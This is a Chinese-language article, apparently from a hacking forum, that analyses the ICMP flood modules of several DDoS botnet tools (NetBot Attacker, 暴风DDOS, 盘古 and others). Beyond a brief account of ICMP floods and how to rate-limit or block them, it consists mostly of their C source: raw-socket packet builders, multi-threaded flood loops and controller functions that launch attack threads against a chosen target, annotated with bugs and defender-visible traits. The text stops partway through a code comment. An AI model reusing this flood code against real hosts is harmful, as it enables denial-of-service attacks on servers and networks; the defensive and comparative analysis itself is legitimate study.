
[Visual Studio文章] 攻击模块分析-ICMP篇 





学习中请遵循国家相关法律法规,黑客不作恶。没有网络安全就没有国家安全


从下面各工具的代码可以看出,ICMP洪水攻击的实现都是先自定义ICMP首部,然后快速、重复地发送。


ICMP洪水攻击(实用于大带宽服务器)

操作系统规定ICMP数据包的最大尺寸不超过64KB。
如果ICMP数据包的尺寸超过64KB上限时,主机就会出现内存分配错误,导致TCP/IP堆栈崩溃,致使主机死机。(现在的操作系统已经限制了发送ICMP数据包的大小,解决了这个漏洞)
    此外,向目标主机长时间、连续、大量地发送ICMP数据包,也会最终使系统瘫痪。大量的ICMP数据包会形成“ICMP风暴”,使得目标主机耗费大量的CPU资源处理,疲于奔命。

防范方法
第一种方法是在路由器上对ICMP数据包进行带宽限制,将ICMP占用的带宽控制在一定的范围内,这样即使有ICMP攻击,它所占用的带宽也是非常有限的,对整个网络的影响非常少;
第二种方法就是在主机上设置ICMP数据包的处理规则,最好是设定拒绝所有的ICMP数据包。

设置ICMP数据包处理规则的方法也有两种,一种是在操作系统上设置包过滤,另一种是在主机上安装防火墙。具体设置如下:

//=================================================================================

冷风的.h

/*ICMP Header*/
/*
 * ICMP header as this tool lays it out: the standard 8-byte echo header
 * (type, code, checksum, identifier, sequence) followed by a 4-byte
 * timestamp, which on the wire is simply the first four payload bytes.
 * All fields are written in host byte order by the code below.
 */
typedef struct _icmphdr     // ICMP header definition
{
BYTE   i_type;      // 8-bit type (8 = echo request, see ICMP_ECHO)
BYTE   i_code;      // 8-bit code
USHORT i_cksum;      // 16-bit ones'-complement checksum
USHORT i_id;      // identifier (this tool stores the low 16 bits of its process id)
USHORT i_seq;      // sequence number
ULONG timestamp;     // GetTickCount value, sent as the start of the payload
}ICMP_HEADER;

/****************ICMP FLOOD*******************************/
/*
 * Build an ICMP echo-request header at the start of icmp_data and copy the
 * global icmpBuffer string (defined elsewhere) directly after it.
 *
 * icmp_data: caller-provided buffer; must hold the header plus
 *            strlen(icmpBuffer) bytes -- nothing here checks that.
 * datasize:  unused; the copy is bounded only by strlen(icmpBuffer).
 * The checksum is left at 0 -- the caller recomputes it before each send.
 */
void fill_icmp_data(char *icmp_data, int datasize)
{
ICMP_HEADER *icmp_hdr;
char       *datapart;
icmp_hdr = (ICMP_HEADER*)icmp_data;   // overlay the header on the buffer head
icmp_hdr->i_type = ICMP_ECHO; // echo request, i.e. the "ping" type
icmp_hdr->i_code = 0; // default code
icmp_hdr->i_id   = (USHORT)GetCurrentProcessId(); // identifier = low 16 bits of the sending process id
icmp_hdr->i_cksum = 0;   // placeholder; recomputed per packet by the caller
icmp_hdr->i_seq = 0;// sequence starts at 0

datapart = icmp_data + sizeof(ICMP_HEADER);
memcpy(datapart,icmpBuffer,strlen(icmpBuffer)); // payload bytes; the terminating NUL is not copied
}

/*
 * Thread entry: send ICMP echo requests to the host named by the global
 * DdosUrl until the global StopDDosAttack becomes non-zero.
 *
 * dParam: unused.
 * Returns 0 always. On setup failure it returns without closing the socket,
 * and the HeapAlloc'd packet buffer is never freed. This version never
 * calls WSAStartup.
 *
 * What a defender would see: one MAX_PACKET-byte echo request every ~100 ms
 * per thread, identifier = process id, sequence wrapping at 65534, and a
 * GetTickCount value in the first four payload bytes. NOTE(review): a raw
 * ICMP socket on Windows normally requires administrator rights -- confirm
 * for the OS version in question.
 */
unsigned long CALLBACK icmp_flood(LPVOID dParam)   // ICMP flood thread body
{  
SOCKET m_hSocket; // raw ICMP socket
SOCKADDR_IN m_addrDest; // destination address
char              *icmp_data;
int   datasize = 32;   // dead: recomputed below but never used
int timeout = 2000;    // send timeout, ms

m_hSocket = WSASocket (AF_INET, SOCK_RAW, IPPROTO_ICMP, NULL, 0,WSA_FLAG_OVERLAPPED); // raw socket, stack builds the IP header
if (m_hSocket == INVALID_SOCKET) // creation failed
   return 0;
if (setsockopt(m_hSocket, SOL_SOCKET, SO_SNDTIMEO, (char*)&timeout, sizeof(timeout)) == SOCKET_ERROR)    // send timeout only (SO_SNDTIMEO); socket leaks on this path
   return 0;

memset(&m_addrDest, 0, sizeof(m_addrDest)); // zero the address struct
m_addrDest.sin_family = AF_INET; // IPv4
m_addrDest.sin_addr.S_un.S_addr=resolve(DdosUrl); // target address via resolve() (defined elsewhere); result not validated

datasize += sizeof(ICMP_HEADER);   // dead store: MAX_PACKET is what is actually sent
icmp_data =(char*) HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY,MAX_PACKET); // packet buffer; NULL not checked
memset(icmp_data,0,MAX_PACKET);   // redundant with HEAP_ZERO_MEMORY
fill_icmp_data(icmp_data,MAX_PACKET); // header + icmpBuffer payload; the callee ignores the size argument

int seq_no=0;
while(!StopDDosAttack) // global stop flag, set elsewhere
{
   ((ICMP_HEADER*)icmp_data)->i_cksum = 0; // checksum field must be 0 while it is computed
   ((ICMP_HEADER*)icmp_data)->i_seq = seq_no++;// per-packet sequence number
   ((ICMP_HEADER*)icmp_data)->timestamp = GetTickCount(); // ms-since-boot stamp in the payload
   ((ICMP_HEADER*)icmp_data)->i_cksum = checksum((USHORT*)icmp_data, MAX_PACKET);// checksum over the full MAX_PACKET bytes
   sendto(m_hSocket, icmp_data, MAX_PACKET, 0, (struct sockaddr*)&m_addrDest, sizeof(m_addrDest));     // return value ignored
   if (seq_no>=65534) // wrap the sequence number
    seq_no=1;
   Sleep(100); // ~10 packets per second per thread
}
return 0;
}

//=================================================================================

Maxer.h

/*ICMP Header*/
/*
 * ICMP header layout used by the Maxer variant: standard 8-byte echo header
 * plus a 4-byte timestamp that becomes the first payload bytes on the wire.
 * In this variant the identifier (2) and sequence (512) are constants.
 */
typedef struct _icmphdr     // ICMP header definition
{
BYTE   i_type;      // 8-bit type (8 = echo request)
BYTE   i_code;      // 8-bit code
USHORT i_cksum;      // 16-bit checksum (never recomputed by IcmpFlood)
USHORT i_id;      // identifier
USHORT i_seq;      // sequence number
ULONG timestamp;     // GetTickCount value, sampled once
}ICMP_HEADER;

//ICMP攻击
/*
 * Thread entry (Maxer variant): send a fixed ICMP echo request to the
 * address in the DDOSINFO passed via dParam until the global IsStop is 1.
 *
 * dParam: PDDOSINFO (project type, defined elsewhere); its addr string is
 *         parsed with inet_addr only -- no hostname fallback, INADDR_NONE
 *         never checked.
 * Returns 0. The socket is never closed and WSACleanup is never called.
 *
 * Analyst notes, all visible below: the header is built once with
 * i_cksum = 0 and never recomputed; timestamp and sequence are constant for
 * the whole run; and the packet buffer is overrun -- memset writes 1024
 * bytes starting sizeof(icmp_header) bytes into a 1024-byte array, and
 * sendto is asked for 1024 + sizeof(icmp_header) bytes from it. Both are
 * undefined behaviour inside the tool itself.
 */
DWORD WINAPI IcmpFlood(LPVOID dParam)
{  
PDDOSINFO pddosinfo = (PDDOSINFO)dParam; // attack parameters from the thread creator
DDOSINFO ddosinfo; // local copy
memcpy(&ddosinfo,pddosinfo,sizeof(DDOSINFO));// copy so the caller's struct is not referenced later

WSADATA wsaData;// filled in by WSAStartup
WSAStartup(MAKEWORD(2, 2), &wsaData);// request Winsock 2.2; return value unchecked

SOCKET m_hSocket;

m_hSocket = WSASocket (AF_INET, SOCK_RAW, IPPROTO_ICMP, NULL, 0,WSA_FLAG_OVERLAPPED); // raw ICMP socket (NOTE(review): normally needs administrator rights on Windows -- confirm)
if (m_hSocket == INVALID_SOCKET) // creation failed
   return 0;

int timeout = 3000;   // send timeout, ms
if (setsockopt(m_hSocket, SOL_SOCKET, SO_SNDTIMEO, (char*)&timeout, sizeof(timeout)) == SOCKET_ERROR) // send timeout only; socket leaks on this path
   return 0;

SOCKADDR_IN m_sockaddr;// destination; never zeroed, so sin_port/sin_zero hold stack garbage
m_sockaddr.sin_family=AF_INET;// IPv4
m_sockaddr.sin_addr.s_addr=inet_addr(ddosinfo.addr);// dotted quad only; INADDR_NONE not checked

ICMP_HEADER icmp_header;// header template, built once
icmp_header.i_code=0;// default code
icmp_header.i_id=2; // fixed identifier (not the process id)
icmp_header.i_cksum=0; // never recomputed: packets leave with a zero ICMP checksum unless the stack fills it in -- confirm on the wire
icmp_header.i_seq=512;// fixed sequence number
icmp_header.i_type=8; // echo request ("ping")
icmp_header.timestamp=GetTickCount(); // ms since boot (DWORD), sampled once for the whole run

char Buffer[1024];
memcpy(Buffer,&icmp_header,sizeof(icmp_header)); // header at the front
memset(Buffer+sizeof(icmp_header),'I',1024); // BUG: 1024 bytes starting sizeof(icmp_header) bytes in -> writes past the end of Buffer
int icmpsize=sizeof(Buffer)+sizeof(icmp_header);   // larger than Buffer: sendto also reads past its end
while(1)
{
   if(IsStop==1)// global stop flag
   {
    ExitThread(0);
    return 0;   // unreachable after ExitThread
   }
   for(int a=0;a<10;a++) // 10 sends per iteration, no delay -> tight loop
    sendto(m_hSocket,Buffer,icmpsize,0,(struct sockaddr *)&m_sockaddr,sizeof(m_sockaddr));    // return value ignored
}
return 0;
}

//=================================================================================

NetBot_Attacker.h

//大家看这个是不是跟 冷风的.h 代码一样呢呵呵 我认为是冷风抄袭NB的呵呵应为NB这个写的早冷风给我的时候比较晚
//冷风给我的时候 NB的这个代码还没发布呢    说明NB早就给冷风了
//在这里就不注释了
/*ICMP Header*/
/*
 * ICMP header layout (NetBot variant; identical to the one above): the
 * standard 8-byte echo header followed by a 4-byte timestamp that is sent
 * as the first payload bytes.
 */
typedef struct _icmphdr     // ICMP header definition
{
BYTE   i_type;      // 8-bit type (8 = echo request)
BYTE   i_code;      // 8-bit code
USHORT i_cksum;      // 16-bit ones'-complement checksum
USHORT i_id;      // identifier (low 16 bits of the process id)
USHORT i_seq;      // sequence number
ULONG timestamp;     // GetTickCount value, carried in the payload
}ICMP_HEADER;

/****************ICMP FLOOD*******************************/
/*
 * Build an ICMP echo-request header at the start of icmp_data and copy the
 * global icmpBuffer string (defined elsewhere) directly after it.
 *
 * icmp_data: caller-provided buffer; must hold the header plus
 *            strlen(icmpBuffer) bytes -- not checked here.
 * datasize:  unused; the copy is bounded only by strlen(icmpBuffer).
 * The checksum is left at 0 for the caller to recompute per packet.
 */
void fill_icmp_data(char *icmp_data, int datasize)
{
ICMP_HEADER *icmp_hdr;
char       *datapart;
icmp_hdr = (ICMP_HEADER*)icmp_data;   // overlay the header on the buffer head
icmp_hdr->i_type = ICMP_ECHO;   // echo request
icmp_hdr->i_code = 0;
icmp_hdr->i_id   = (USHORT)GetCurrentProcessId();   // identifier = low 16 bits of the process id
icmp_hdr->i_cksum = 0;   // recomputed by the caller
icmp_hdr->i_seq = 0;

datapart = icmp_data + sizeof(ICMP_HEADER);
memcpy(datapart,icmpBuffer,strlen(icmpBuffer));   // payload bytes, no terminator
}

/*
 * Thread entry (NetBot variant): send ICMP echo requests to the host named
 * by the global fuckweb.FuckIP until the global stopfuck becomes non-zero.
 *
 * dParam: unused.
 * Returns 0 always. Differences from the variant above: WSAStartup is
 * called (result unchecked) and the inter-packet delay is 40 ms. On setup
 * failure the socket leaks; the packet buffer is never freed; WSACleanup
 * is never called.
 * NOTE(review): a raw ICMP socket on Windows normally requires
 * administrator rights -- confirm for the OS version in question.
 */
unsigned long CALLBACK icmp_flood(LPVOID dParam)
{  
WSADATA wsaData;
WSAStartup(MAKEWORD(2, 2), &wsaData);   // request Winsock 2.2; return value unchecked
SOCKET m_hSocket;
SOCKADDR_IN m_addrDest;
char              *icmp_data;
int   datasize = 32;   // dead: never used after the add below
int timeout = 2000;    // send timeout, ms

m_hSocket = WSASocket (AF_INET, SOCK_RAW, IPPROTO_ICMP, NULL, 0,WSA_FLAG_OVERLAPPED);   // raw ICMP socket
if (m_hSocket == INVALID_SOCKET)
   return 0;
if (setsockopt(m_hSocket, SOL_SOCKET, SO_SNDTIMEO, (char*)&timeout, sizeof(timeout)) == SOCKET_ERROR)   // send timeout only; socket leaks on this path
   return 0;

memset(&m_addrDest, 0, sizeof(m_addrDest));
m_addrDest.sin_family = AF_INET;
m_addrDest.sin_addr.S_un.S_addr=resolve(fuckweb.FuckIP);   // target via resolve() (defined elsewhere); result not validated

datasize += sizeof(ICMP_HEADER);   // dead store
icmp_data =(char*) HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY,MAX_PACKET);   // packet buffer; NULL not checked
memset(icmp_data,0,MAX_PACKET);   // redundant with HEAP_ZERO_MEMORY
fill_icmp_data(icmp_data,MAX_PACKET);   // header + icmpBuffer payload

int seq_no=0;
while(!stopfuck)   // global stop flag
{
   ((ICMP_HEADER*)icmp_data)->i_cksum = 0;   // must be 0 while the checksum is computed
   ((ICMP_HEADER*)icmp_data)->i_seq = seq_no++;   // per-packet sequence
   ((ICMP_HEADER*)icmp_data)->timestamp = GetTickCount();   // ms since boot
   ((ICMP_HEADER*)icmp_data)->i_cksum = checksum((USHORT*)icmp_data, MAX_PACKET);   // over all MAX_PACKET bytes
   sendto(m_hSocket, icmp_data, MAX_PACKET, 0, (struct sockaddr*)&m_addrDest, sizeof(m_addrDest));   // return value ignored
   if (seq_no>=65534)   // wrap
    seq_no=1;
   Sleep(40);   // ~25 packets per second per thread
}
return 0;
}

//=================================================================================

暴风DDOS.h

// ICMP type 8 = echo request; MAX_PACKET = bytes handed to sendto per packet
// (header + payload + zero fill), well above the usual Ethernet MTU, so each
// packet is IP-fragmented on the wire.
#define ICMP_ECHO               8
#define MAX_PACKET       4096

/*
 * ICMP header layout (暴风DDOS variant): standard 8-byte echo header plus a
 * 4-byte timestamp that is sent as the first payload bytes.
 */
typedef struct _icmphdr     // ICMP header definition
{
BYTE   i_type;      // 8-bit type (ICMP_ECHO)
BYTE   i_code;      // 8-bit code
USHORT i_cksum;      // 16-bit ones'-complement checksum
USHORT i_id;      // identifier (low 16 bits of the process id)
USHORT i_seq;      // sequence number
ULONG timestamp;     // GetTickCount value, carried in the payload
}ICMP_HEADER;

/*
 * Build an ICMP echo-request header at the start of icmp_data and copy the
 * global icmpBuffer string (defined elsewhere) directly after it.
 *
 * icmp_data: caller-provided buffer of at least sizeof(ICMP_HEADER) +
 *            strlen(icmpBuffer) bytes -- not checked here.
 * datasize:  unused.
 * The checksum is left at 0 for the caller to recompute per packet.
 */
void fill_icmp_data(char *icmp_data, int datasize)
{
ICMP_HEADER *icmp_hdr;
char       *datapart;
icmp_hdr = (ICMP_HEADER*)icmp_data;   // overlay the header on the buffer head
icmp_hdr->i_type = ICMP_ECHO;   // echo request
icmp_hdr->i_code = 0;
icmp_hdr->i_id   = (USHORT)GetCurrentProcessId();   // low 16 bits of the process id
icmp_hdr->i_cksum = 0;   // recomputed by the caller
icmp_hdr->i_seq = 0;

datapart = icmp_data + sizeof(ICMP_HEADER);
memcpy(datapart,icmpBuffer,strlen(icmpBuffer));   // payload bytes, no terminator
}

/*
 * Thread body (暴风DDOS variant): after a 2 s delay, resolve the global
 * tgtIP and send bursts of 100 MAX_PACKET-byte ICMP echo requests with a
 * 5 ms pause between bursts, until the global StopFlag becomes 1.
 *
 * Takes no arguments (StartICMP passes NULL). Returns on any setup failure
 * without closing the socket; the packet buffer is never freed; WSACleanup
 * is never called.
 * NOTE(review): a raw ICMP socket on Windows normally requires
 * administrator rights -- confirm for the OS version in question.
 */
void icmp_flood()
{  
Sleep(2000);   // delay before the first packet
WSADATA wsaData;
WSAStartup(MAKEWORD(2, 2), &wsaData); // request Winsock 2.2; return value unchecked
SOCKET m_hSocket;
SOCKADDR_IN m_addrDest; // destination address
char              *icmp_data;
int   datasize = 32;   // dead: MAX_PACKET is what is actually sent
int timeout = 2000;    // local send timeout (ms); shadows the file-scope timeout used by StartICMP

m_hSocket = WSASocket (AF_INET, SOCK_RAW, IPPROTO_ICMP, NULL, 0,WSA_FLAG_OVERLAPPED); // raw ICMP socket
if (m_hSocket == INVALID_SOCKET)   // creation failed
   return;
if (setsockopt(m_hSocket, SOL_SOCKET, SO_SNDTIMEO, (char*)&timeout, sizeof(timeout)) == SOCKET_ERROR)    // send timeout only; socket leaks on this path
   return;

memset(&m_addrDest, 0, sizeof(m_addrDest)); // zero the address struct
m_addrDest.sin_family = AF_INET; // IPv4
if ((m_addrDest.sin_addr.s_addr = inet_addr(tgtIP)) == INADDR_NONE)
{   // not a dotted quad: fall back to a blocking DNS lookup of tgtIP
   struct hostent *hp = NULL;
   if ((hp = gethostbyname(tgtIP)) != NULL)
   {
   memcpy(&(m_addrDest.sin_addr), hp->h_addr, hp->h_length); // first returned address only
   m_addrDest.sin_family = hp->h_addrtype;
   }
   else
    return;   // unresolvable: give up (socket leaks)
}            

datasize += sizeof(ICMP_HEADER);   // dead store
icmp_data =(char*) HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY,MAX_PACKET); // packet buffer; NULL not checked
memset(icmp_data,0,MAX_PACKET); // redundant with HEAP_ZERO_MEMORY
fill_icmp_data(icmp_data,MAX_PACKET); // header + icmpBuffer payload; the callee ignores the size argument
int seq_no=0;
int sleep_time = SleepTime/10; // derived from the global SleepTime but never used
while(1)
{
   if (StopFlag == 1)// global stop flag
   {
    ExitThread(0);
    return;   // unreachable after ExitThread
   }
   ((ICMP_HEADER*)icmp_data)->i_cksum = 0;// must be 0 while the checksum is computed
   ((ICMP_HEADER*)icmp_data)->i_seq = seq_no++;// one sequence value per burst; no wrap handling, truncated into USHORT
   ((ICMP_HEADER*)icmp_data)->timestamp = GetTickCount(); // ms since boot
   ((ICMP_HEADER*)icmp_data)->i_cksum = checksum((USHORT*)icmp_data, MAX_PACKET);// over all MAX_PACKET bytes
   for (int i=0;i<100;i++) // 100 identical packets per burst
    sendto(m_hSocket, icmp_data, MAX_PACKET, 0, (struct sockaddr*)&m_addrDest, sizeof(m_addrDest));     // return value ignored
   Sleep(5); // pause between bursts, ms
}
return;
}


/*
 * Controller: resolve `ip` into the global tgtIP, then start `xc` icmp_flood
 * threads plus one wait_for_end thread (both defined elsewhere).
 *
 * ip:   dotted quad or hostname; copied into tgtIP with an unbounded strcpy
 *       (tgtIP's size is not visible here). If the lookup fails, tgtIP keeps
 *       its previous value.
 * port, time: BUG -- assigned FROM the globals (`port=tgtPort; time=timeout;`)
 *       instead of into them, so the caller's values are discarded. The
 *       later version of this function in this file does it the other way.
 * xc:   number of flood threads.
 * Uses the file-scope StopFlag (-1 = running) as a re-entry guard; `i` and
 * `h` are file-scope too, and `h` keeps only the last thread handle. No
 * handle is ever closed.
 */
void StartICMP(char ip[30],int port,int time,int xc)
{

   if (inet_addr(ip)== INADDR_NONE)
   {   // not a dotted quad: blocking DNS lookup
    struct hostent *hp = NULL;
    if ((hp = gethostbyname(ip)) != NULL)
    {
     in_addr in;
     memcpy(&in, hp->h_addr, hp->h_length);   // first returned address only
     strcpy(tgtIP,inet_ntoa(in));   // unbounded copy into the global
    }
   }
   else
    strcpy(tgtIP,ip);   // unbounded copy into the global


   port=tgtPort;   // BUG: overwrites the parameter, global unchanged
   time=timeout;   // BUG: same

   if (StopFlag == -1)   // already running
    return;

   StopFlag=-1;   // mark as running

   for(i=0;i<xc;i++)
   {
    h=CreateThread(0,0,(LPTHREAD_START_ROUTINE)icmp_flood,NULL,0,NULL);   // handle overwritten each pass, never closed
   }
   CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)wait_for_end, NULL, 0, NULL);   // timer thread, defined elsewhere; handle discarded
}

//==================== ================================

暴风DDOSVIP2010-225源代码.h

/*-----------------------------ICMP data-----------------------------------------------*/
/*
 * ICMP header layout (暴风DDOS VIP 2010 variant): standard 8-byte echo
 * header plus a 4-byte timestamp sent as the first payload bytes. In this
 * variant the identifier (2) and sequence (512) are constants.
 */
typedef struct _icmphdr     // ICMP header definition
{
BYTE   i_type;      // 8-bit type (8 = echo request)
BYTE   i_code;      // 8-bit code
USHORT i_cksum;      // 16-bit checksum (never recomputed by icmpattack)
USHORT i_id;      // identifier
USHORT i_seq;      // sequence number
ULONG timestamp;     // GetTickCount value, sampled once
}ICMP_HEADER;

/*
 * Thread body (暴风DDOS VIP 2010 variant): send a fixed ICMP echo request to
 * the global tgtIP in a tight loop until the global StopFlag becomes 1.
 *
 * Takes no arguments. Uses the file-scope `timeout` (set by StartICMP) as
 * the send timeout. Returns on setup failure without closing the socket;
 * the WSACleanup after the loop is unreachable.
 *
 * Analyst notes, all visible below: i_cksum stays 0 and is never
 * recomputed; timestamp and sequence are constant; and the packet buffer
 * is overrun -- memset writes 1024 bytes starting sizeof(icmp_header) bytes
 * into a 1024-byte array, and sendto reads 1024 + sizeof(icmp_header)
 * bytes from it. Both are undefined behaviour inside the tool itself.
 * NOTE(review): a raw ICMP socket on Windows normally requires
 * administrator rights -- confirm for the OS version in question.
 */
void icmpattack()
{  
WSADATA wsaData; // filled in by WSAStartup
WSAStartup(MAKEWORD(2, 2), &wsaData); // request Winsock 2.2; return value unchecked

SOCKET m_hSocket;

m_hSocket = WSASocket (AF_INET, SOCK_RAW, IPPROTO_ICMP, NULL, 0,WSA_FLAG_OVERLAPPED); // raw ICMP socket
if (m_hSocket == INVALID_SOCKET) // creation failed
   return;

if (setsockopt(m_hSocket, SOL_SOCKET, SO_SNDTIMEO, (char*)&timeout, sizeof(timeout)) == SOCKET_ERROR)    // send timeout only, from the file-scope timeout; socket leaks on this path
   return;

SOCKADDR_IN m_sockaddr; // destination; never zeroed, so sin_port/sin_zero hold stack garbage
m_sockaddr.sin_family=AF_INET; // IPv4
m_sockaddr.sin_addr.s_addr=inet_addr(tgtIP); // tgtIP was already resolved to a dotted quad by StartICMP; INADDR_NONE not checked

ICMP_HEADER icmp_header;// header template, built once
icmp_header.i_code=0;// default code
icmp_header.i_id=2; // fixed identifier
icmp_header.i_cksum=0; // never recomputed: zero checksum on the wire unless the stack fills it in -- confirm
icmp_header.i_seq=512;// fixed sequence number
icmp_header.i_type=8; // echo request ("ping")
icmp_header.timestamp=GetTickCount();// ms since boot, sampled once

char Buffer[1024];
memcpy(Buffer,&icmp_header,sizeof(icmp_header)); // header at the front
memset(Buffer+sizeof(icmp_header),'I',1024); // BUG: writes past the end of Buffer
int icmpsize=sizeof(Buffer)+sizeof(icmp_header);   // larger than Buffer: sendto also reads past its end
while(1)
{
   if(StopFlag==1)// global stop flag
   {
    ExitThread(0);
    return;   // unreachable after ExitThread
   }
   for(int a=0;a<10;a++) // 10 sends per iteration, no delay -> tight loop
    sendto(m_hSocket,Buffer,icmpsize,0,(struct sockaddr *)&m_sockaddr,sizeof(m_sockaddr)); // return value ignored
}
WSACleanup();    // unreachable: the loop above only exits via ExitThread
return;
}


/*
 * Controller: resolve `ip` into the global tgtIP, store port/time in the
 * globals tgtPort/timeout, then start `xc` icmpattack threads and, if a
 * timeout was given, one wait_for_end thread (defined elsewhere).
 *
 * ip:   dotted quad or hostname; copied into tgtIP with an unbounded strcpy
 *       (tgtIP's size is not visible here). If the lookup fails, tgtIP keeps
 *       its previous value.
 * port, time: copied into the file-scope tgtPort and timeout (this version
 *       has the assignments the right way round).
 * xc:   number of attack threads; `z` and the handle array `h` are
 *       file-scope, and nothing here bounds xc against h's size.
 * StopFlag == -1 means "running" and guards against re-entry. Thread
 * handles are never closed.
 */
void StartICMP(char ip[30],int port,int time,int xc)
{
   if (inet_addr(ip)== INADDR_NONE)
   {   // not a dotted quad: blocking DNS lookup
    struct hostent *hp = NULL;
    if ((hp = gethostbyname(ip)) != NULL)
    {
     in_addr in;
     memcpy(&in, hp->h_addr, hp->h_length);   // first returned address only
     strcpy(tgtIP,inet_ntoa(in));   // unbounded copy into the global
    }
   }
   else
    strcpy(tgtIP,ip);   // unbounded copy into the global


   tgtPort=port;   // not used by icmpattack; kept for the other attack modules
   timeout=time;   // send timeout for icmpattack, and the run length for wait_for_end

   if (StopFlag == -1)   // already running
    return;

   StopFlag=-1;   // mark as running

   for(z=0;z<xc;z++)
   {
    h[z]=CreateThread(0,0,(LPTHREAD_START_ROUTINE)icmpattack,NULL,0,NULL);   // no bound check on z vs. h's size
   }
   if(timeout!=0)
   {
    CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)wait_for_end, NULL, 0, NULL);   // timer thread; handle discarded
   }
}

//================ ===================================

分布式DDOS.h

// Packet layout used by the 分布式DDOS client: 8-byte ICMP echo header plus
// a 16-byte data field, 24 bytes total with 2-byte alignment. Note that
// AttackThread sends this over a UDP socket, so on the wire it is UDP
// payload, not an ICMP message.
struct ICMPHeader   //24bytes
{
unsigned char type;       // 8 = echo request
unsigned char code;       // 0
unsigned short checksum;  // ones'-complement sum over the whole struct
unsigned short ProcessID; // identifier = low 16 bits of the process id
unsigned short Seq;       // sequence number, always 0 here
char data[16];            // "Attack you!" + NUL, remaining bytes uninitialized
};

//initialize ICMP packet
// Fill an ICMPHeader as an echo request and compute its checksum over the
// whole 24-byte struct (header + 16-byte data field).
//
// p: caller-provided struct; every header field is written. data[] gets
//    "Attack you!" (12 bytes with the NUL), which fits in data[16]; the
//    last 4 bytes keep whatever the caller left there and are both
//    checksummed and sent -- AttackThread passes an uninitialized struct,
//    so those are stack bytes.
void InitICMPPacket(ICMPHeader* p)
{
p->type=8; // echo request ("ping")
p->code=0;// default code
p->ProcessID=(unsigned short)GetCurrentProcessId(); // identifier = low 16 bits of the process id
p->Seq=0;// sequence number; the caller never changes it
char buf[]="Attack you!";
strcpy(p->data,buf); // 12 bytes incl. NUL into data[16]

// RFC 1071-style ones'-complement sum of 16-bit words in host order
unsigned long ulSum=0;
unsigned short *pBuf=(unsigned short *)p;
int size=sizeof(ICMPHeader);   // 24, always even
int index=0;
for(;size > 1;size -= 2,index++)
   ulSum += pBuf[index];
if(size != 0) ulSum += pBuf[index];   // odd-tail branch: unreachable for this 24-byte struct (and would add a whole word, not one byte)
ulSum = (ulSum>>16) + (ulSum&0xffff);   // fold the carries
ulSum += (ulSum>>16);
p->checksum = (unsigned short)(~ulSum);
}

// Worker thread (UINT(void*) -- presumably started via AfxBeginThread,
// not shown here). Sends the ICMPHeader built by InitICMPPacket in a loop
// while p->isAttacking is true.
//
// param: CDDOSClientDlg* whose att_head.ip (dotted quad) is the target and
//        whose isAttacking flag stops the loop.
// Returns 0. The socket is never closed.
//
// The socket is SOCK_DGRAM/IPPROTO_UDP, not raw ICMP, so the "ICMP header"
// is just UDP payload, and att_addr is never zeroed, so the destination
// port (sin_port) is whatever the stack held. On the wire this shows up as
// a 24-byte-payload UDP stream from an unprivileged socket, not as ICMP.
UINT CDDOSClientDlg::AttackThread(void* param)
{
CDDOSClientDlg *p = (CDDOSClientDlg *)param;

SOCKET att_sock = socket(PF_INET,SOCK_DGRAM,IPPROTO_UDP); // UDP socket; result not checked
SOCKADDR_IN att_addr; // destination; sin_port left uninitialized
att_addr.sin_family = PF_INET; // IPv4
att_addr.sin_addr.s_addr = inet_addr(p->att_head.ip); // dotted quad only; INADDR_NONE not checked

ICMPHeader packet;   // uninitialized; InitICMPPacket overwrites all but the tail of data[]
InitICMPPacket(&packet); // fill header + checksum once
while(p->isAttacking)
{
   sendto(att_sock,(char *)&packet,sizeof(ICMPHeader),0,(sockaddr *)&att_addr,sizeof(SOCKADDR_IN)); // 24 bytes per send; return value ignored
   //Sleep(1000);   // delay disabled -> busy loop
}

return 0;
}

//======================= ==========================

盘古1.5代码.h

//这里我们可以看到和 暴风DDOS.h   是一样的所以我们不介绍了
//暴风DDOS(前几个版本) 的攻击模块是使用盘古的

/////////////ICMP 攻击
/*ICMP Header*/
/*
 * ICMP header layout (盘古 1.5): standard 8-byte echo header plus a 4-byte
 * timestamp sent as the first payload bytes.
 */
typedef struct _icmphdr     // ICMP header definition
{
BYTE   i_type;      // 8-bit type (ICMP_ECHO)
BYTE   i_code;      // 8-bit code
USHORT i_cksum;      // 16-bit ones'-complement checksum
USHORT i_id;      // identifier (low 16 bits of the process id)
USHORT i_seq;      // sequence number
ULONG timestamp;     // GetTickCount value, carried in the payload
}ICMP_HEADER;


// ICMP type 8 = echo request; MAX_PACKET = bytes handed to sendto per packet
#define ICMP_ECHO               8
#define MAX_PACKET       4096

/*
 * Internet (RFC 1071) ones'-complement checksum over `size` bytes at
 * `buffer`: 16-bit words are summed in host byte order, a trailing odd
 * byte is added as an 8-bit value, and the carries are folded back in.
 * Returns the complemented 16-bit sum; a zero-length input yields 0xFFFF.
 */
USHORT checksum(USHORT *buffer, int size)
{
unsigned long acc = 0;
int remaining = size;
USHORT *word = buffer;

for (; remaining > 1; remaining -= (int)sizeof(USHORT))
{
   acc += *word++;
}
if (remaining)
{
   acc += *(UCHAR*)word;   /* lone trailing byte */
}
/* fold the 32-bit accumulator into 16 bits, twice to absorb the carry */
acc = (acc >> 16) + (acc & 0xffff);
acc += acc >> 16;
return (USHORT)(~acc);
}


/*
 * Build an ICMP echo-request header at the start of icmp_data and copy the
 * global icmpBuffer string (defined elsewhere) directly after it.
 *
 * icmp_data: caller-provided buffer of at least sizeof(ICMP_HEADER) +
 *            strlen(icmpBuffer) bytes -- not checked here.
 * datasize:  unused.
 * The checksum is left at 0 for the caller to recompute per packet.
 */
void fill_icmp_data(char *icmp_data, int datasize)
{
ICMP_HEADER *icmp_hdr;
char       *datapart;
icmp_hdr = (ICMP_HEADER*)icmp_data;   // overlay the header on the buffer head
icmp_hdr->i_type = ICMP_ECHO;   // echo request
icmp_hdr->i_code = 0;
icmp_hdr->i_id   = (USHORT)GetCurrentProcessId();   // low 16 bits of the process id
icmp_hdr->i_cksum = 0;   // recomputed by the caller
icmp_hdr->i_seq = 0;

datapart = icmp_data + sizeof(ICMP_HEADER);
memcpy(datapart,icmpBuffer,strlen(icmpBuffer));   // payload bytes, no terminator
}

/*
 * Thread body (盘古 1.5; the 暴风DDOS version above is the same code): after
 * a 2 s delay, resolve the global tgtIP and send bursts of 100
 * MAX_PACKET-byte ICMP echo requests with a 5 ms pause between bursts,
 * until the global StopFlag becomes 1.
 *
